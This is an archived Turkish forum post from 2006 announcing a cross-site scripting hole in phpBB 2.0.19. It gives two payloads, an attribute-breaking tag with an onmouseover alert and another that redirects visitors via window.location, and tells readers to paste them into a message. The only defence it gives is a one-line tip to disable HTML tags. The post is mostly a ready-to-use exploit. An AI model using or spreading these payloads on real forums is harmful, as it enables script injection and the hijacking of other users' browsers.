PDA

Orijinalini görmek için tıklayınız : Phpbb 2.0.19 XSS


M@sterz
02-02-2006, 04:35 PM
Phpbb 2.0.19 versiyonunda xss ac1g1 tespit edilmistir

Kod:
<B C='>' onmouseover='alert("yavsak.be")' X='<B '> megatr.org </B>



Kod:
<B C='>' onmouseover='window.location=[Only Registered Users Can See Links] ([Only Registered Users Can See Links])' X='<B '> megatr.org</B>


yukardaki xss kodlar1n1 mesaj k1sm1na yaz1yorsunuz

Ac1g1 kapatman1n yolu:

Tüm html taglar1n1 kapatmak